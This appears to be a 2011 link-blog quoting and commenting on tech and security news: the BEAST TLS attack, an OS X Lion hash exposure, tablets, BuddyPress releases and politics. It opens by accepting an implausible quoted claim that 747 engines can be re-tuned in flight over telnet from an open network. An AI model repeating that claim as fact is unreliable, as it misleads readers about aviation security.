For those who do not know, 747’s are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.
The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is… I need not say more.
FACT CHECK: SCADA Systems Are Online Now by Craig S Wright for INFOSEC Island.
Who knew Boeing 747’s were huge UNIX zombies in-waiting? Convenience and paranoia of a secure firewall breaking some “mission critical” functionality is all too common. It is for these reasons that there is so much half-ass security implementations in the wild.
Unfortunately, our leaders rarely see the benefit of security. In fact, security merely sucks resources - money and people and money - without providing any immediate return on investment. Security ROI is a subjective, political art many are unable to master.
Our leaders are all too willing to take huge risks, falsely believing their systems and networks will not be targeted or their half-ass security posture is enough to withstand an attack. Can you imagine what might happen if malicious attackers were able to gain control of a 747’s engine management system?
I cannot fathom why, other than pure laziness, these systems are not properly secured. With a layered defense posture, combined ingress and egress firewalls and filters, it would be fairly easy to secure these systems. This is utterly flabbergasting.
But specs do not sell tablets. Most consumers are looking for a different experience than what they can get on their desktop or notebook. Without knowing it, they’re looking for lasting novelty. Sure, some consumers want multitasking, some want a tweakable interface, perhaps some out there even want a tablet with seven homescreens and an app drawer. That’s where Android tablets come in. The iPad, however, captures consumers with a slightly new paradigm in portable computing and does so with style and class.
If A Motorola Android Tab Leaks And It’s Just Like The Rest, Does It Really Matter? by Matt Burns from TechCrunch.
Simply put: Android tablets are missing the simplicity and elegance of the iPad.
Therein lies the current problem with Android tablets. Vendors are too busy pimping out specs, playing the same game with tablets that they played with desktops and laptops. Customers flocked to the iPad because of its simplicity, not just in the use of the device but also in being able to determine which model to buy. Have the vendors learned nothing from Apple over the course of the past ten years?
Simplicity is key. One of the reasons Apple’s iPad has been so successful is that it transcends these games. The only real questions a potential iPad buyer must ask themselves are: 1) Do I need 3G access in addition to wifi? and 2) How much onboard storage space do I need? With the impending release of iCloud - and other services like Spotify and Dropbox - the second question is becoming increasingly irrelevant.
The new era of mobile computing will not be defined by chip speeds, RAM and storage space. Instead, it will be defined by other more consumer-oriented features such as screen size, mobile carrier access, and immediate availability of applications.
The latter area - tablet specific applications - is where Android currently lags way behind Apple. Until this changes, Android is going to have a tough time gaining any significant traction in the tablet market.
Amazon has begun sending out invites for an upcoming September 28 press conference, most likely to announce its fabled tablet. Rather than being held in their global headquarters in Seattle, the press conference is taking place smack dab in the middle of the publishing industry: New York City. The implication is Amazon will be positioning the device not necessarily as an iPad competitor, but a higher-grade version of their Kindle, designed for consuming content purchased from the Amazon ecosystem.
Regardless of how Amazon is positioning the device, I am very excited to see what they have designed and built. I am not sure what is more exciting: the hardware or what Amazon has done with their forked version of Android. Either way, the Christmas buying season is going to be interesting, with a lot of Kindle $TABLET vs. iPad 2 discussion taking place. (via TiPb)
The Cyberwar Arms Race. I’m not worried about cyberwar, but I am worried about the proliferation of cyber weapons. Arms races are fundamentally destabilizing, especially when their development can be so easily hidden. I worry about cyberweapons being triggered by accident, cyberweapons getting into the wrong hands and being triggered on purpose, and the inability to reliability trace a cyberweapon leading to increased distrust. Plus, arms races are expensive.
Three Emerging Cyber Threats by Bruce Schneier.
It’s hard to argue with Schneier, as he is one of the most insightful security commentators around. He has always taken a much more pragmatic view of the world rather than predicting doom and gloom like so many pundits and news organizations.
BuddyPress 1.5 Released
Coinciding with the recent bbPress upgrade, BuddyPress 1.5 has been released:
Version 1.5 is a major BuddyPress feature release. Code-named “Lombardi” after the first pizzeria in the United States (with a wink and a nod toward the Wisconsin roots of several members of the BP dev team), BuddyPress 1.5 introduces many dozens of new features and enhancements, on top of hundreds of bugfixes.
As with any new software release, there are a host of new features, bug fixes and more. The more notable changes in BuddyPress 1.5 are an improved interface for managing profiles, a refreshed default theme offering header customization, an optional one-column page template, sexier content design and much better integration with bbPress.
This is a one of the more kick ass updates to BuddyPress. If you have ever considered running your own specialized social network then BuddyPress may be just what the doctor ordered. While an out-the-box solution of BuddyPress, bbPress and WordPress does make for a spiffy site, definitely take some time to customize it up a bit - BP makes it about as easy as possible.
Normally, both your asses would be dead as fucking fried chicken, but you happen to pull this shit while I’m in a transitional period so I don’t wanna kill you, I wanna help you. But I can’t give you this case, it don’t belong to me. Besides, I’ve already been through too much shit this morning over this case to hand it over to your dumb ass.
The Samuel L. Ipsum generator has got to be the best of its breed. Use it to create some charismatic motherfucking placeholder text.
You gotta admit, reading Samuel L. Jackson quotes is a whole lot more exciting than the boring Latin text we are used to seeing these days. (via Kottke)
Nikkei Business scooped the news on Thursday, September 22 that AU by KDDI, a Japanese mobile phone carrier, will carry the new iPhone 5 in November 2011.
AU by KDDI to carry iPhone 5 in Japan.
If true, this is outstanding news, especially with recent concerns that Softbank is considering getting rid of their unlimited data plan.
Serious TLS Vulnerability Discovered
Dan Goodin for The Register:
The vulnerability resides in versions 1.0 and earlier of TLS, or transport layer security, the successor to the secure sockets layer technology that serves as the internet’s foundation of trust. Although versions 1.1 and 1.2 of TLS aren’t susceptible, they remain almost entirely unsupported in browsers and websites alike, making encrypted transactions on PayPal, GMail, and just about every other website vulnerable to eavesdropping by hackers who are able to control the connection between the end user and the website he’s visiting.
TLS is the encryption standard used by millions of popular web sites, including not only PayPal and Gmail as mentioned but also for e-commerce in many cases. That your session is susceptible to eavesdropping by malicious attackers should give you pause.
“BEAST is different than most published attacks against HTTPS,” Duong wrote in an email. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”
Things are only going to get worse before they get better. Up until now browser security has only been of peripheral interest. Now that attacks like these are increasing in both frequency and complexity, maybe the browser vendors will start to consider more secure means of safeguarding transport and data.
What most people are probably concerned with is whether or not they should stop buying things online or conducting online banking. I would submit that you are more than likely still safe; the chances of being targeted is fairly slim. However, you do need to remain vigilant and be very cautious when handling any form of online monetary transactions. Constantly monitor your credit cards and bank accounts for fraudulent activity and immediately report anything out of the ordinary.
Be careful out there. It’s a brave new world.
bbPress 2.0 Unleashed
From the bbPress blog release announcement:
Simply by activating bbPress 2.0, any standard WordPress theme is suddenly capable of having support forums, user profiles, topic tags, and custom topic views. Your users are able to mark topics as favorites to read them later, and can subscribe to be notified via email to topic replies, so they never miss out on the conversation.
One of the cooler features of bbPress 2.0 is that it has built-in support for BuddyPress, significantly simplifying integration with the “social network in a box” WordPress plug-in. This alone should make bbPress attractive, not to mention the countless other new features, bug fixes and minor changes.
It appears in the redesign of OS X Lion’s authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.
This is a must-read if you are at all interested in security. There are no fixes currently available. Presumably, Apple will patch this vulnerability in a forthcoming security update.
At least eight different kinds of computer virus including Trojan horse, which steals key information from infected computer hardware, were found at Mitsubishi Heavy’s main office or production sites, the Yomiuri said. It is the country’s biggest defense contractor, winning 215 deals worth 260 billion yen ($3.4 billion) from Japan’s Ministry of Defense in the year to last March, or nearly a quarter of the ministry’s spending that year.
Japan’s defence industry hit by its first cyber attack from Reuters.
I find the “first cyber attack” claim to be pretty dubious, especially considering it is 2011. These so-called “cyber attacks” happen every day. That Mitsubishi is finally capable of detecting and confirming an intrusion is terrifying. Hopefully the other defense contractors have a much better grasp on information technology and information assurance practices.
This situation is only going to get worse.
Lastly, I wish the article did not refer to what they found as a virus. It is better described as malware. Calling what was found a virus gives the impression that installing some form of anti-virus software would have detected the malicious activity.
Nothing could be further from reality.
Mr. Obama, in a bit of political salesmanship, will call his proposal the “Buffett Rule,” in a reference to Warren E. Buffett, the billionaire investor who has complained repeatedly that the richest Americans generally pay a smaller share of their income in federal taxes than do middle-income workers, because investment gains are taxed at a lower rate than wages.
Obama Tax Plan Would Ask More of Millionaires by Jackie Calmes for the NY Times.
This is merely another Obama proposal for the GOP to refuse to enact regardless of how much it makes sense, simply because Obama is not one of them and they protect their own.
A glimpse of North Korea from Boston.com.
All of the imagery is absolutely stunning.
Windows 8 BSOD now includes a sad face :(.
Seriously.
On a serious note, it sure is nice to see Microsoft finally simplify the previously over-complicated BSOD. How many people ever paid attention to all the crazy STOP codes and hex dump and whatnot? This, at least, makes some sense.
An Ohio woman said Tuesday that she endured nearly four hours in police custody that included being forced off an airplane in handcuffs, strip-searched and interrogated at Detroit’s airport on the 10th anniversary of the Sept. 11 attacks — all, she believes, because of her Middle Eastern appearance.
Shoshana Hebshi, 35, told The Associated Press she was one of three people removed from a Denver-to-Detroit Frontier Airlines flight after landing Sunday afternoon. Authorities say fighter jets escorted the plane after its crew reported that two people were spending a long time in a bathroom — the two men sitting next to Hebshi in the 12th row.
Passenger: Was Cuffed, Searched Over ‘Appearance’ at NPR.
The terrorists have won.
